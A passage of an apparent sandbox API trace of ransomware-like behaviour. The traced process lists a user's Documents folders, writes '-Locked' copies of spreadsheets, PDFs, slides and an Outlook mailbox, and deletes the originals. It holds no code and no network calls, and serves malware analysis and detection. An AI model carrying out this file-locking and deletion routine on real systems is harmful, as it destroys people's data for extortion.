lpOldMode=0x1af00c) returned 1 [0300.608] GetFileType (hFile=0x49c) returned 0x1 [0300.610] CloseHandle (hObject=0x49c) returned 1 [0300.610] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\ppl3T.xlsx-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\ppl3T.xlsx-Locked", lpFilePart=0x0) returned 0x3e [0300.611] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\ppl3T.xlsx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\ppl3t.xlsx-locked")) returned 1 [0300.611] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\rRshMO_Ed0_wrhaH.pdf-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\rRshMO_Ed0_wrhaH.pdf-Locked-Locked", lpFilePart=0x0) returned 0x4f [0300.611] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.612] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\rRshMO_Ed0_wrhaH.pdf-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\rrshmo_ed0_wrhah.pdf-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.612] GetFileType (hFile=0x49c) returned 0x1 [0300.612] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.612] GetFileType (hFile=0x49c) returned 0x1 [0300.614] CloseHandle (hObject=0x49c) returned 1 [0300.614] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\rRshMO_Ed0_wrhaH.pdf-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\rRshMO_Ed0_wrhaH.pdf-Locked", lpFilePart=0x0) returned 0x48 [0300.615] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\rRshMO_Ed0_wrhaH.pdf-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\rrshmo_ed0_wrhah.pdf-locked")) returned 1 [0300.617] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music", lpFilePart=0x0) returned 0x28 [0300.617] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0300.617] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music", lpFilePart=0x0) returned 0x28 [0300.617] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music\\", lpFilePart=0x0) returned 0x29 [0300.617] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0300.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af128) returned 1 [0300.620] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures", lpFilePart=0x0) returned 0x2b [0300.620] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0300.620] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures", lpFilePart=0x0) returned 0x2b [0300.620] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures\\", lpFilePart=0x0) returned 0x2c [0300.620] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0300.620] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af128) returned 1 [0300.622] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos", lpFilePart=0x0) returned 0x29 [0300.622] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0300.622] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos", lpFilePart=0x0) returned 0x29 [0300.622] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos\\", lpFilePart=0x0) returned 0x2a [0300.623] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0300.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af128) returned 1 [0300.633] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files", lpFilePart=0x0) returned 0x2d [0300.633] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0300.633] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files", lpFilePart=0x0) returned 0x2d [0300.633] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\", lpFilePart=0x0) returned 0x2e [0300.633] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63954f0d, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x65ef9a5c, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x878c65f2, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0300.634] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63954f0d, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x65ef9a5c, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x878c65f2, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0300.635] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6397affd, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x6397affd, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x878917cb, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x0, cFileName="achoo@gdllo.de.pst", cAlternateFileName="ACHOO@~1.PST")) returned 1 [0300.635] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0300.635] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0300.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0300.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0300.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0300.636] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files", lpFilePart=0x0) returned 0x2d [0300.636] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\", lpFilePart=0x0) returned 0x2e [0300.636] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63954f0d, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x65ef9a5c, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x878c65f2, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0300.636] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63954f0d, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x65ef9a5c, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x878c65f2, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0300.637] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6397affd, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x6397affd, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x878917cb, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x0, cFileName="achoo@gdllo.de.pst", cAlternateFileName="ACHOO@~1.PST")) returned 1 [0300.637] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6397affd, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x6397affd, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x878917cb, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x0, cFileName="achoo@gdllo.de.pst", cAlternateFileName="ACHOO@~1.PST")) returned 0 [0300.637] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0300.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0300.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0300.638] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\achoo@gdllo.de.pst-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\achoo@gdllo.de.pst-Locked", lpFilePart=0x0) returned 0x47 [0300.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.638] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\achoo@gdllo.de.pst-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\achoo@gdllo.de.pst-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.638] GetFileType (hFile=0x49c) returned 0x1 [0300.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.638] GetFileType (hFile=0x49c) returned 0x1 [0300.651] CloseHandle (hObject=0x49c) returned 1 [0300.652] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\achoo@gdllo.de.pst", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\achoo@gdllo.de.pst", lpFilePart=0x0) returned 0x40 [0300.652] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\achoo@gdllo.de.pst" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\achoo@gdllo.de.pst")) returned 1 [0300.652] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf", lpFilePart=0x0) returned 0x34 [0300.653] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0300.653] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf", lpFilePart=0x0) returned 0x34 [0300.653] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\", lpFilePart=0x0) returned 0x35 [0300.653] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc54d42a0, ftCreationTime.dwHighDateTime=0x1d7dcc2, ftLastAccessTime.dwLowDateTime=0xf09fdea0, ftLastAccessTime.dwHighDateTime=0x1d7dd20, ftLastWriteTime.dwLowDateTime=0xf09fdea0, ftLastWriteTime.dwHighDateTime=0x1d7dd20, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0300.653] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc54d42a0, ftCreationTime.dwHighDateTime=0x1d7dcc2, ftLastAccessTime.dwLowDateTime=0xf09fdea0, ftLastAccessTime.dwHighDateTime=0x1d7dd20, ftLastWriteTime.dwLowDateTime=0xf09fdea0, ftLastWriteTime.dwHighDateTime=0x1d7dd20, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0300.654] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9810a20, ftCreationTime.dwHighDateTime=0x1d7e33e, ftLastAccessTime.dwLowDateTime=0xc2a5e770, ftLastAccessTime.dwHighDateTime=0x1d7e625, ftLastWriteTime.dwLowDateTime=0xc2a5e770, ftLastWriteTime.dwHighDateTime=0x1d7e625, nFileSizeHigh=0x0, nFileSizeLow=0x283d, dwReserved0=0x0, dwReserved1=0x0, cFileName="7yOeoNYz.pps", cAlternateFileName="")) returned 1 [0300.737] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68ecbaf0, ftCreationTime.dwHighDateTime=0x1d7e243, ftLastAccessTime.dwLowDateTime=0x154a9780, ftLastAccessTime.dwHighDateTime=0x1d7e3fd, ftLastWriteTime.dwLowDateTime=0x154a9780, ftLastWriteTime.dwHighDateTime=0x1d7e3fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="86tOlWarla8QzutUG", cAlternateFileName="86TOLW~1")) returned 1 [0300.737] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99911cc0, ftCreationTime.dwHighDateTime=0x1d7e5e3, ftLastAccessTime.dwLowDateTime=0xd8b5b4a0, ftLastAccessTime.dwHighDateTime=0x1d7e6f2, ftLastWriteTime.dwLowDateTime=0xd8b5b4a0, ftLastWriteTime.dwHighDateTime=0x1d7e6f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HWRMtdbPbmWq20", cAlternateFileName="HWRMTD~1")) returned 1 [0300.738] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11919910, ftCreationTime.dwHighDateTime=0x1d7e18a, ftLastAccessTime.dwLowDateTime=0xdaf09500, ftLastAccessTime.dwHighDateTime=0x1d7e477, ftLastWriteTime.dwLowDateTime=0xdaf09500, ftLastWriteTime.dwHighDateTime=0x1d7e477, nFileSizeHigh=0x0, nFileSizeLow=0xa9b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="wQMgowjROjyJ.ods", cAlternateFileName="WQMGOW~1.ODS")) returned 1 [0300.738] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0300.738] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0300.738] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0300.738] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0300.739] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0300.739] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf", lpFilePart=0x0) returned 0x34 [0300.739] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\", lpFilePart=0x0) returned 0x35 [0300.739] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc54d42a0, ftCreationTime.dwHighDateTime=0x1d7dcc2, ftLastAccessTime.dwLowDateTime=0xf09fdea0, ftLastAccessTime.dwHighDateTime=0x1d7dd20, ftLastWriteTime.dwLowDateTime=0xf09fdea0, ftLastWriteTime.dwHighDateTime=0x1d7dd20, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0300.739] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc54d42a0, ftCreationTime.dwHighDateTime=0x1d7dcc2, ftLastAccessTime.dwLowDateTime=0xf09fdea0, ftLastAccessTime.dwHighDateTime=0x1d7dd20, ftLastWriteTime.dwLowDateTime=0xf09fdea0, ftLastWriteTime.dwHighDateTime=0x1d7dd20, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0300.739] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9810a20, ftCreationTime.dwHighDateTime=0x1d7e33e, ftLastAccessTime.dwLowDateTime=0xc2a5e770, ftLastAccessTime.dwHighDateTime=0x1d7e625, ftLastWriteTime.dwLowDateTime=0xc2a5e770, ftLastWriteTime.dwHighDateTime=0x1d7e625, nFileSizeHigh=0x0, nFileSizeLow=0x283d, dwReserved0=0x0, dwReserved1=0x0, cFileName="7yOeoNYz.pps", cAlternateFileName="")) returned 1 [0300.740] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68ecbaf0, ftCreationTime.dwHighDateTime=0x1d7e243, ftLastAccessTime.dwLowDateTime=0x154a9780, ftLastAccessTime.dwHighDateTime=0x1d7e3fd, ftLastWriteTime.dwLowDateTime=0x154a9780, ftLastWriteTime.dwHighDateTime=0x1d7e3fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="86tOlWarla8QzutUG", cAlternateFileName="86TOLW~1")) returned 1 [0300.740] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99911cc0, ftCreationTime.dwHighDateTime=0x1d7e5e3, ftLastAccessTime.dwLowDateTime=0xd8b5b4a0, ftLastAccessTime.dwHighDateTime=0x1d7e6f2, ftLastWriteTime.dwLowDateTime=0xd8b5b4a0, ftLastWriteTime.dwHighDateTime=0x1d7e6f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HWRMtdbPbmWq20", cAlternateFileName="HWRMTD~1")) returned 1 [0300.740] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11919910, ftCreationTime.dwHighDateTime=0x1d7e18a, ftLastAccessTime.dwLowDateTime=0xdaf09500, ftLastAccessTime.dwHighDateTime=0x1d7e477, ftLastWriteTime.dwLowDateTime=0xdaf09500, ftLastWriteTime.dwHighDateTime=0x1d7e477, nFileSizeHigh=0x0, nFileSizeLow=0xa9b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="wQMgowjROjyJ.ods", cAlternateFileName="WQMGOW~1.ODS")) returned 1 [0300.740] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11919910, ftCreationTime.dwHighDateTime=0x1d7e18a, ftLastAccessTime.dwLowDateTime=0xdaf09500, ftLastAccessTime.dwHighDateTime=0x1d7e477, ftLastWriteTime.dwLowDateTime=0xdaf09500, ftLastWriteTime.dwHighDateTime=0x1d7e477, nFileSizeHigh=0x0, nFileSizeLow=0xa9b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="wQMgowjROjyJ.ods", cAlternateFileName="WQMGOW~1.ODS")) returned 0 [0300.740] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0300.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0300.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0300.741] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\7yOeoNYz.pps-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\7yOeoNYz.pps-Locked", lpFilePart=0x0) returned 0x48 [0300.741] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.741] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\7yOeoNYz.pps-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\uuxtjuwzmgem k7fgnf\\7yoeonyz.pps-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 